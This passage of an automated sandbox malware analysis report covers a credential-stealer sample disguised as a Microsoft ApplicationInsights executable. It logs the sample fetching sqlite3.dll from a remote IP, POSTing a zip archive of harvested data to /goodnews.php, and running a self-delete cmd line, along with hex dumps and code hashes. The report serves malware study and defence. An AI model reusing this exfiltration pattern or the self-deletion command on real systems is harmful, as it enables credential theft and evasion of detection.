Sep 13, 2021 15:56:36.710457087 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 13, 2021 15:57:07.016707897 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:57:07.052508116 CEST	53	51255	8.8.8.8	192.168.2.4
Sep 13, 2021 15:57:08.524023056 CEST	61522	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:57:08.564846039 CEST	53	61522	8.8.8.8	192.168.2.4

HTTP Request Dependency Graph

77.222.42.92

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49759	77.222.42.92	80	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2021 15:55:33.426397085 CEST	1218	OUT	GET /public/sqlite3.dll HTTP/1.1 Host: 77.222.42.92 Cache-Control: no-cache
Sep 13, 2021 15:55:33.504663944 CEST	1219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:33 GMT Content-Type: application/x-msdos-program Content-Length: 645592 Connection: keep-alive Last-Modified: Tue, 24 Aug 2021 22:41:19 GMT ETag: "9d9d8-5ca55d50d41c0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113
Sep 13, 2021 15:55:33.504699945 CEST	1221	IN	Data Raw: 00 db 19 00 00 00 f0 08 00 00 1a 00 00 00 5a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 32 34 00 00 00 00 b0 01 00 00 00 10 09 00 00 02 00 00 00 74 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 Data Ascii: Z@B/124t@B
Sep 13, 2021 15:55:33.504724026 CEST	1222	IN	Data Raw: 00 89 de c1 fe 1f 29 d8 19 f2 89 01 89 51 04 c6 41 28 00 c6 41 29 00 c6 41 2b 00 83 c4 2c 5b 5e 5f c9 c3 55 89 e5 57 56 53 83 ec 2c 89 c3 80 78 28 00 0f 85 10 01 00 00 80 78 2a 00 75 1a c7 40 08 d0 07 00 00 c7 40 0c 01 00 00 00 c7 40 10 01 00 00 Data Ascii: )QA(A)A+,[^_UWVS,x(x*u@@@S.D$\&D$$T$`P,$5`}fUfUm]mE)`$,$5`m]muid)`
Sep 13, 2021 15:55:33.504754066 CEST	1224	IN	Data Raw: 57 56 53 83 ec 2c 89 c3 8b 75 08 8b 7d 0c a1 18 a2 97 60 89 04 24 89 55 e4 e8 21 ff ff ff 89 1d 28 a2 97 60 8b 55 e4 89 15 2c a2 97 60 89 35 20 a2 97 60 89 3d 24 a2 97 60 8b 15 40 a2 97 60 83 ff 00 7c 1b 7f 05 83 fe 00 76 14 89 d3 c1 fb 1f b8 01 Data Ascii: WVS,u}`$U!(`U,`5 `=$`@`\|v9\|9v1<``$1,[^_UWVS,(`t^@`5,`(``$UM\|$UMT$L$4$`$[(`5,`,
Sep 13, 2021 15:55:33.504780054 CEST	1225	IN	Data Raw: 00 e8 61 f4 ff ff 8b 45 e4 2b 45 e0 8b 1d 40 a2 97 60 89 5d d8 89 da c1 fa 1f 89 55 dc 89 45 d0 99 89 55 d4 8b 15 20 a2 97 60 8b 0d 24 a2 97 60 2b 55 d0 1b 4d d4 39 4d dc 7c 0b 7f 04 39 d3 72 05 e8 fd fa ff ff 8b 45 e4 89 44 24 04 89 34 24 ff 15 Data Ascii: aE+E@`]UEU `$`+UM9M\|9rED$4$4`u&=(`t1UT$4$4`t$4+E1`$ED$4$4`<[^_USta1{@umtP9~=
Sep 13, 2021 15:55:33.504802942 CEST	1226	IN	Data Raw: 00 00 8a 13 0f b6 fa f6 87 a0 42 97 60 04 75 e0 89 45 cc 80 fa 2e 0f 85 8b 00 00 00 01 cb bf 0a 00 00 00 eb 37 6b 75 d4 0a 8b 45 d0 f7 e7 89 45 a0 01 f2 89 55 a4 0f be 75 c4 83 ee 30 89 75 d0 89 f2 c1 fa 1f 89 55 d4 8b 45 a0 8b 55 a4 01 45 d0 11 Data Ascii: B`uE.7kuEEUu0uUEUEUEM;]U}\|}wEB`uE;]B`u<Et<eub;]<-u<+u11!'kEt'
Sep 13, 2021 15:55:33.504827976 CEST	1228	IN	Data Raw: 01 19 c0 83 e0 02 eb 05 b8 01 00 00 00 83 c4 44 5b 5e 5f c9 c3 55 89 e5 57 56 53 83 ec 24 89 c1 89 55 e4 8a 00 3c 2d 75 08 41 bb 01 00 00 00 eb 0f 31 db 3c 2b 0f 94 c0 0f b6 c0 01 c1 eb 01 41 80 39 30 74 fa 31 f6 31 c0 31 d2 89 45 d8 89 55 dc 89 Data Ascii: D[^_UWVS$U<-uA1<+A90t111EUM7FtVkEEeEMU}EUMUMM<10x#~tu1$[^_EU]}+u}u}\|wU
Sep 13, 2021 15:55:33.504853010 CEST	1229	IN	Data Raw: 5b 5e 5f c9 c3 55 89 e5 85 c0 79 10 3d 00 00 00 80 74 04 f7 d8 eb 05 b8 ff ff ff 7f c9 c3 55 89 e5 56 53 66 39 d0 0f bf c8 0f bf da 7c 19 8d 53 31 39 d1 7f 31 8d 53 1f 39 d1 7f 1b 29 d9 0f b6 91 dc 81 97 60 eb 1c 8d 71 31 89 d0 39 f3 7f 16 8d 51 Data Ascii: [^_Uy=tUVSf9\|S191S9)`q19Q9~@)`[^Uwv(.w1vQ(w2v+(w=wwwfN`UVS1f
Sep 13, 2021 15:55:33.504878044 CEST	1230	IN	Data Raw: c6 42 1d 02 c7 40 20 00 00 00 00 c7 40 24 00 00 00 00 5b c9 c3 55 89 e5 8b 50 1c 8b 0a 89 48 20 85 c9 74 05 89 41 24 eb 0a 80 7a 1c 00 74 04 c6 42 1d 01 89 02 83 7a 04 00 75 03 89 42 04 83 7a 08 00 75 09 f6 40 18 04 75 03 89 42 08 c9 c3 55 89 e5 Data Ascii: B@ @$[UPH tA$ztBzuBzu@uBUPzt'xuB,D$D$B($`USf@HfCfu$CHCuY[Z[SX[US@tCH{u@,D$
Sep 13, 2021 15:55:33.504901886 CEST	1232	IN	Data Raw: 5f c9 c3 55 89 e5 56 53 83 ec 10 8b 45 08 83 78 0c 00 74 30 8b 18 8b 03 89 04 24 e8 c3 df ff ff 8b 73 04 c7 43 04 00 00 00 00 89 d8 e8 cb fe ff ff 89 73 04 8b 03 89 45 08 83 c4 10 5b 5e c9 e9 cf df ff ff 83 c4 10 5b 5e c9 c3 55 89 e5 56 53 83 ec Data Ascii: _UVSExt0$sCsE[^[^UVS]$s$$[^UWVS,u]E>$EHEuG9Gv{GtXC__F CE,[^_*UWVS,
Sep 13, 2021 15:55:33.579386950 CEST	1233	IN	Data Raw: 44 e8 2e d8 ff ff 8b 43 5c 89 04 24 e8 1f df ff ff c7 43 5c 00 00 00 00 c7 43 60 00 00 00 00 c7 43 34 00 00 00 00 83 c4 10 5b 5e c9 c3 55 89 e5 0f b6 ca 83 f9 0a 74 05 83 f9 0d 75 07 89 50 28 c6 40 0f 06 89 d0 c9 c3 55 89 e5 83 ec 18 8b 10 8b 52 Data Ascii: D.C\$C\C`C4[^UtuP(@UR,t$~~USxu@<tC<[[UVS@dpC*C\C`-
Sep 13, 2021 15:55:35.510276079 CEST	1892	OUT	GET /goodnews.php HTTP/1.1 Host: 77.222.42.92 Connection: Keep-Alive
Sep 13, 2021 15:55:35.595369101 CEST	1892	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Set-Cookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache
Sep 13, 2021 15:55:35.610235929 CEST	1893	OUT	POST /goodnews.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUS Host: 77.222.42.92 Content-Length: 83420 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Sep 13, 2021 15:55:35.610399961 CEST	1905	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 33 57 4c 4e 4f 48 44 4a 4d 59 4d 37 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4d 37 59 35 50 5a 55 4b 2e 7a 69 Data Ascii: ------E3WLNOHDJMYM7YUSContent-Disposition: form-data; name="file"M7Y5PZUK.zip------E3WLNOHDJMYM7YUSContent-Disposition: form-data; name="file"; filename="M7Y5PZUK.zip"Content-Type: application/octet-streamContent-Transfer-Encodin
Sep 13, 2021 15:55:35.687254906 CEST	1906	OUT	Data Raw: ca b1 85 05 b2 57 4f 8c d4 5c d0 bf 7f 5b 41 b7 03 af 1a dc 56 9f d1 77 6c af 1a 0a 11 e4 d6 9e 3c 65 f8 31 1d 5b ed e8 91 e7 1d be ba c8 c3 22 22 7c 10 87 56 50 a9 65 71 95 fb ea 37 fd 72 a4 e7 cc ad ed 4c 40 59 f0 db 59 61 c2 3b be cb 24 13 ae Data Ascii: WO\[AVwl<e1[""\|VPeq7rL@YYa;$u%yW>Pf8l{-kHkI}I2Z_r"Tqh~&ysD35&Ao,$4\sjvZv(W\|4;o1[qrS!<q [(^Q
Sep 13, 2021 15:55:35.687647104 CEST	1912	OUT	Data Raw: a7 a2 d3 f1 6d 08 ae be bf 14 dd 19 38 29 d9 77 e0 71 48 15 6e a9 6b 0a b6 b6 d1 e1 ef 19 a0 2c 9d eb b4 76 95 fb 71 49 5d 02 8f 36 9d 60 83 27 a7 64 70 6a 1b c5 9f 3b 9b 36 19 ce 11 3f 84 a7 38 2e f4 f3 a9 2a 53 3e ef b4 0e ef fc 11 a4 88 57 87 Data Ascii: m8)wqHnk,vqI]6`'dpj;6?8.*S>WzkAbbJ;K@ 3b/l[Y C$N0f,?2T@Jy6^s&1w7O'k+%Z<%t> !$Vpr@\|l%ho/?T
Sep 13, 2021 15:55:35.687721014 CEST	1930	OUT	Data Raw: 4a 34 e3 fc 9f a7 c5 3c 35 2a ac 08 fe 58 ce 54 45 70 46 d9 eb 27 1c 51 ca dd 9c 67 b4 2c f8 22 20 5f b2 c5 83 ea 97 e2 04 c3 4c ae d1 27 91 bb 88 c9 c4 c4 c0 19 ab d1 02 79 dc 77 6d 90 62 8a 8e aa cd af ba 31 ab e6 17 78 fd 98 92 cf 63 a1 f9 f3 Data Ascii: J4<5*XTEpF'Qg," _L'ywmb1xc/=gzD=m\sF\Xa@/tJ6Gj!!ToAx.nArv[Z#_$]?BjS8H$3?xEt`Wg~]4?^6^k._Fsp
Sep 13, 2021 15:55:35.761956930 CEST	1933	OUT	Data Raw: ca bf 5b 44 1c dc 50 5c 4b cb 2c 86 3d 05 a2 cd 8b 7e c1 50 a9 84 f2 34 03 9f c5 aa a0 ba a0 c8 f9 ca 8b 2a 49 54 06 d3 b2 46 61 4f 13 75 67 5d 6a b1 ba f3 1d 03 23 88 72 e1 70 1c 20 b7 43 c1 b4 5a ea 74 c5 2d 60 36 ca 19 0f 7c 4a dc 08 88 42 99 Data Ascii: [DP\K,=~P4*ITFaOug]j#rp CZt-`6\|JB:;m'DQbQZgz$z,a <AI$7}#WEk.`@DZ.&BM,ITJ\|dCgIk`<,/A~G~h9P3-zz`y[~\|u4\8_6[2
Sep 13, 2021 15:55:35.762026072 CEST	1938	OUT	Data Raw: ef 01 39 57 b1 af b2 ff 45 e3 e5 ce 9d 86 b5 e0 e4 e3 9f c7 96 09 01 a3 5d 3d 87 58 b4 e6 91 97 40 6f cd c1 98 e8 95 e9 e0 8a 21 ee f5 ea 5b 0c 53 99 f4 58 f4 82 d2 40 28 6a dd 84 08 c6 ea 86 92 7d 49 43 91 86 06 1e 44 30 20 cc ef 38 a1 3d e6 93 Data Ascii: 9WE]=X@o![SX@(j}ICD0 8=.q:J~F/ iJ<plXRSVP$F2n</taXu4H+u'qDQD8~Y0h]Yl_GNX\|x8IN=\|%GQ=3&W7
Sep 13, 2021 15:55:35.762083054 CEST	1941	OUT	Data Raw: 25 ce 27 be 5e 4a 5f 9f 5d 8f e7 67 31 d3 10 97 96 76 fc ca fb 5a 63 90 eb 3d 5b e7 be eb b5 90 b6 f2 10 94 62 04 bc 51 c5 0f e5 3f 57 20 ce 1b b4 da 93 d8 8f ed 18 7c ae d6 bd 73 0f 75 3b 32 7f 3a f3 21 c2 c6 40 54 ae 64 b1 73 6b d2 6c d7 8f 21 Data Ascii: %'^J_]g1vZc=[bQ?W \|su;2:!@Tdskl!"?wD?i8P~\Rsip5Ju\|SSly\F&ZYeX]\y)xAr8#wE rxR*zUp z>WP9sK&S
Sep 13, 2021 15:55:35.762228012 CEST	1943	OUT	Data Raw: e2 54 cd 31 90 b0 c6 69 87 78 eb 82 7d c7 11 23 bb ed 0d 81 9d f8 bb 6b 5f bb 09 3d c7 d9 38 c2 ef 1b 9a c3 63 50 ab 55 c2 61 b2 b7 c0 df 24 66 46 11 f1 85 7b 4c e2 d3 30 41 62 e9 35 34 c2 10 ae 45 ab ab 4b 30 40 c0 c0 a1 90 ff 4d 4d a2 45 82 74 Data Ascii: T1ix}#k_=8cPUa$fF{L0Ab54EK0@MMEtICdz7MJ%%+K/-3:&CA_Ge:ZMvk*il=G78e+dwzdZSI6<JIp"l63qRsAxyQ
Sep 13, 2021 15:55:35.762341022 CEST	1946	OUT	Data Raw: 28 13 68 fe 81 ae 2f 4c dc 1a 05 5a f0 e3 3d 4b dd dd c4 d1 1a bb ae 87 c3 ff 68 73 15 2a 8d 69 f3 5d c1 67 d0 b4 f8 7a 4e 2c 04 26 c4 48 8f 45 eb 30 7b e0 33 92 b2 90 c0 fa 55 2d 76 67 1b 84 29 c3 75 39 c3 97 b5 ae fc 92 a4 c1 ab 7d bd 02 01 bf Data Ascii: (h/LZ=Khs*i]gzN,&HE0{3U-vg)u9}WzSr)[/\$]32wS2~Ifbc_Cy"_-@Rq>YqK}z{Yd`:m6p`<'Ktn--Ocm$7
Sep 13, 2021 15:55:35.762411118 CEST	1959	OUT	Data Raw: 3c 8e 51 f6 fc 50 a4 d0 82 11 84 81 97 15 42 1a 6a b2 7c 76 0d 01 37 e1 83 60 5e fa 29 11 fb 14 89 e2 65 b7 28 9a 50 4a 6f 10 42 28 c1 69 15 20 00 0c 80 89 c9 19 49 24 5f 07 1e 15 b8 31 ab 18 5a 1c 0c fa a9 dc a7 04 30 1c 0e 83 a8 b6 73 a8 48 70 Data Ascii: <QPBj\|v7`^)e(PJoB(i I$_1Z0sHpC5P"r:M})yZdYc0OI -4`G@\I$r0Qz#;X8wajUy`T"Q.[hT3t 4S^NGWJ
Sep 13, 2021 15:55:35.879106045 CEST	1977	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 7056 Parent PID: 6504

General

Start time:	15:55:28
Start date:	13/09/2021
Path:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Imagebase:	0xaf0000
File size:	469480 bytes
MD5 hash:	14E351015C5D632F888DBCAC03871FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 6340 Parent PID: 7056

General

Start time:	15:55:32
Start date:	13/09/2021
Path:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Imagebase:	0x590000
File size:	469480 bytes
MD5 hash:	14E351015C5D632F888DBCAC03871FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2216 Parent PID: 6340

General

Start time:	15:55:36
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5576 Parent PID: 2216

General

Start time:	15:55:36
Start date:	13/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 5624 Parent PID: 2216

General

Start time:	15:55:37
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0x2a0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5568 Parent PID: 7056

General

Start time:	15:55:41
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Imagebase:	0xb00000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 7056 Parent PID: 6504 Microsoft.ApplicationInsights.PersistenceChannel.exeCOMMON

Executed Functions

Function 02DDDA8C, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1356138a7f1b7425a060ded606bf9ce5830c5fc8ce6890e11f27c793ac20fab
Instruction ID: 35f235cda7f2ff04e66c718f01d2166aef604d818827bce204a4fd2a3b02ef55
Opcode Fuzzy Hash: c1356138a7f1b7425a060ded606bf9ce5830c5fc8ce6890e11f27c793ac20fab
Instruction Fuzzy Hash: 91919F35E007198FCB04DFA1D8549EDBBBAFF89304F548615E416AF7A0EB30A985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DDE150, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead42cbfd8411093e2651aca6d5f15330dadeb045e4cab7f3d116185cbee2b91
Instruction ID: 74ed8ca9f65ba64ab0bb6ac394627673c785fb98aebf4b9c153ca64e2a76e981
Opcode Fuzzy Hash: ead42cbfd8411093e2651aca6d5f15330dadeb045e4cab7f3d116185cbee2b91
Instruction Fuzzy Hash: E4819D35E007198FCB04DFE1D8948DDBBBAFF8A304F508615E405AB7A0EB30A985DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02DD6981, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02DD69F0
GetCurrentThread.KERNEL32 ref: 02DD6A2D
GetCurrentProcess.KERNEL32 ref: 02DD6A6A
GetCurrentThreadId.KERNEL32 ref: 02DD6AC3

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4927c02af6673d3e7607527ecb21f4bf500e8970e51d6194f9581e6d61be2fc9
Instruction ID: 9cbf2d9528cd698f0e5b34264bae0f8a50307c587774db920d0b8bdbe95d1447
Opcode Fuzzy Hash: 4927c02af6673d3e7607527ecb21f4bf500e8970e51d6194f9581e6d61be2fc9
Instruction Fuzzy Hash: 555179B49047858FDB14CFA9D64879EBBF4EB49344F108459D419A3350D7349884CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DD6990, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02DD69F0
GetCurrentThread.KERNEL32 ref: 02DD6A2D
GetCurrentProcess.KERNEL32 ref: 02DD6A6A
GetCurrentThreadId.KERNEL32 ref: 02DD6AC3

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9235c8ded62f23ed2ae80be3f46134f86296ae5adc87ad2a14be8ab70fad20e2
Instruction ID: d10c361bd095b7d238dadd62d5e384b54ff99e0c8f8da85e220f2e210c58a012
Opcode Fuzzy Hash: 9235c8ded62f23ed2ae80be3f46134f86296ae5adc87ad2a14be8ab70fad20e2
Instruction Fuzzy Hash: 385156B4E006498FDB14CFAAD64879EBBF5EB48344F208459E419B7390DB749884CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02DDB990, Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02DDBBE6

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 41307591c3ba2ff898d33aca9266c4366d9029dd7b54f18e4f25d63a74a96367
Instruction ID: 8ab09390745a0a2e903b0366d9e53e822ede71537154dc81aa032a575835c051
Opcode Fuzzy Hash: 41307591c3ba2ff898d33aca9266c4366d9029dd7b54f18e4f25d63a74a96367
Instruction Fuzzy Hash: 23714570A00B058FDB24DF6AD44476ABBF1FF88208F01892AD58AD7B50DB75E949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02DDDE58, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDDF6A

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f9bb912438c70ea101f90487de1e07e5c698e8deb78d6878de0da19844e50932
Instruction ID: ee1066717239874074861e793d2858b35519c8b2ae37ccfcfb5270c3d577d88c
Opcode Fuzzy Hash: f9bb912438c70ea101f90487de1e07e5c698e8deb78d6878de0da19844e50932
Instruction Fuzzy Hash: A741C0B1D007489FDF14CFA9C984ADEBBB6BF88314F24812AE819AB350D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DDDE57, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDDF6A

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ee7a51b6786b3c3860497bc675865cd1ffe5e70aced21be9ed79171771d84ba6
Instruction ID: 1d52479325240409618e523c64743a5a16709c7330d0dbebab1bdadfca3239c9
Opcode Fuzzy Hash: ee7a51b6786b3c3860497bc675865cd1ffe5e70aced21be9ed79171771d84ba6
Instruction Fuzzy Hash: 6341B0B5D007499FDF14CFA9C984ADEBBB2BF88314F24852AE819AB350D7749845CF90

Uniqueness

